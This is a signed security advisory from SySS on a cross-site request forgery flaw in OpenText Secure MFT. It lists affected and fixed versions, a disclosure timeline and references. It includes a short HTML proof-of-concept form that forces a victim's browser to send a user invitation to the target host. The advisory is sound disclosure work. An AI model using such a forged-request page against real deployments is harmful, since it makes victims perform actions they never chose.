Secure MFT Cross Site Request Forgery

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2015-039  
Product: Secure MFT  
Vendor: http://www.opentext.com  
Affected Version(s): 2013 R3, 2014 R1/R2, 2015 R1  
Tested Version(s): 2014 R2 SP4  
Vulnerability Type: Cross-Site Request Forgery (CWE-352)  
Risk Level: Medium  
Solution Status: Fixed  
Vendor Notification: 2015-08-05  
Solution Date: 2015-09-23  
Public Disclosure: 2015-10-02  
CVE Reference: Not yet assigned  
Author of Advisory: Dr. Adrian Vollmer  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Secure MFT aims to replace FTP or file transfer via e-mail by providing a  
secure and easy-to-use alternative. Users can send each other files of  
practically any size either by using a Microsoft Windows client, a Microsoft  
Outlook plugin or a web application.  
  
The software manufacturer describes the application as follows  
(see [1]):  
  
"OpenText Secure MFT is an enterprise-grade managed file transfer solution  
that delivers uncompromising security to safely exchange large files."  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The web application is vulnerable to Cross-Site Request Forgery since no  
tokens are used to prevent this kind of attack.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
As a proof of concept, the following HTML document could be used by an  
attacker to perform actions in the context of the victim if the attacker  
manages to trick the victim into opening the document in their browser.  
  
<html>  
<body>  
<form action="https://[Secure MFT host]/userinvitation" method="POST">  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="subject" value="CSRF Invite" />  
<input type="hidden" name="message" value="CSRF Message" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Update Secure MFT to one of the following versions or newer:  
  
* Secure MFT 2013 R3 SP7  
* Secure MFT 2014 R1 SP11  
* Secure MFT 2014 R2 SP5  
* Secure MFT 2015 R1 SP1  
* Secure MFT 2015 R1 FP1 SP1  
  
Software updates are available at [5]. For further information, see [4].  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2015-07-01: Vulnerability discovered  
2015-08-05: Vulnerability reported to vendor  
2015-09-23: Vendor publishes security alert  
2015-10-02: Public release of security advisory according to the SySS  
Responsible Disclosure Policy  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Web site of Secure MFT  
https://www.opentext.com/what-we-do/products/information-exchange/secure-messaging/opentext-secure-mft  
[2] SySS Security Advisory SYSS-2015-039  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-039.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
[4] https://knowledge.opentext.com/knowledge/cs.dll/Open/61171764 (Knowledge Center log on required)  
[5] https://knowledge.opentext.com/knowledge/llisapi.dll?func=ll&objId=61042901&objAction=browse&viewType=1  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Dr. Adrian Vollmer of the SySS GmbH.  
  
E-Mail: adrian.vollmer (at) syss.de  
Key fingerprint = 70CF E88C AEE7 DB0F 5DC8 3403 0E02 7C7E 037C 9FE7  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web   
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJWDi/6AAoJEA4CfH4DfJ/n5WkP/0aveg0S+J2aKuwVv88wNwTr  
0lMQFAM83UWmpgP6Mj/PrmMOQBK+Qc41sHsJ737ibEIxcnPhNXlpbN8d+TMl9uJ5  
dqQAcLecTC3gzfuNvu89qhoG1XOP34lKCgVHMP1NTsyzvqORR7TZYYMSxHicA4+y  
qSvWcjiIiyfSHTvcHj4/TU7UjqE4CBQehqw184Jor7vg5hm5OH2eJl0M4ptpMLek  
QoQkf6IpVZrdXzPwknUMra/LKxIDmGouPwhEKXNmkJV1Ti6FbgN/td+6gbpnqPbi  
pUHn5VQsxlBXlf9KuJX9lZKshrtxXZ0hLbK32qVEAO9rDwgUeDN4YQFK0CHAlFNi  
0p7WdQbR8o47l8e77IrwsKWmmo6z5SkaeOZYMgvCrzH/9mGfbVk43HQ/iMA8jN3J  
ggEaK+9l+7r/VWGNt7QLkf/h0sBlfqaj626gw5ncFF9/9Hc61ouC0UQEzLrAYYz6  
FvHvEKzISUPkSzVcKH6K4cfjIvsj57Hs1jghVMBibTeVQf7hTVn2KMUHzno/ZI4y  
fAU6slyu4aG8Y/SrHqGUqEKVGtLXaSGo8TsDjThU7pxeFvbIfCM1z7J0I6QuztLl  
hN2PLWI48M72xgv/hm2wBaCTLG41BGFHbY7MzWacCuq568aCm+tFOWqGVhsTOPXm  
Tu89cKLfbXW4oarRud5W  
=aroc  
-----END PGP SIGNATURE-----  
`